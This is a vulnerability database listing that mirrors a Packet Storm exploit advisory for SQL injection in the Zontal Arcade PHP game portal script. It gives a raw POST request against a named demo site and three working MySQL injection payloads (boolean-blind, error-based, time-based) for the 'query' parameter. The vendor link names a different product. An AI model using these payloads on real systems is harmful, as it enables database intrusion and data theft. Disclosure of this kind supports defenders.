Lucene search
K

Zontal Arcade HTML 5 Game Portal PHP Script SQL Injection

🗓️ 07 Mar 2025 00:00:00Reported by Buğra Enis DönmezType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 857 Views

SQL Injection vulnerability found in Zontal Arcade HTML 5 Game Portal PHP script exploiting POST requests.

Code
# Exploit Title: Zontal Arcade HTML 5 Game Portal PHP Script - SQL Injection
    # Date: 05-03-2025
    # Exploit Author: Buğra Enis Dönmez (n3c1)
    # Vendor: https://www.codester.com/items/12775/azon-dominator-affiliate-marketing-script
    # Demo Site: https://mvnstore.in/
    # Tested on: Arch Linux
    # CVE: N/A
    
    
    ### Request ###
    
    POST /xhr/live-search.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    Accept: /
    x-requested-with: XMLHttpRequest
    Referer: https://localhost
    Cookie: PHPSESSID=i1e2drrnljsdoi3v6k60cg9ehi
    Content-Length: 135
    Accept-Encoding: gzip,deflate,br
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: mvnstore.in
    Connection: Keep-alive
    
    page=3&query=4
    
    ###
    
    ### Parameter & Payloads ###
    
    Parameter: query (POST)
        Type: boolean-based blind
        Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
        Payload: page=3&query=4%' AND MAKE_SET(4114=4114,6966) AND 'ZtvW%'='ZtvW
    
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: page=3&query=4%' AND (SELECT 6392 FROM(SELECT COUNT(*),CONCAT(0x71766b7071,(SELECT (ELT(6392=6392,1))),0x7170707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NwQp%'='NwQp
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: page=3&query=4%' AND (SELECT 7502 FROM (SELECT(SLEEP(5)))Eovh) AND 'THGQ%'='THGQ
    
    ###

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Mar 2025 00:00Current
8.2High risk
Vulners AI Score8.2
857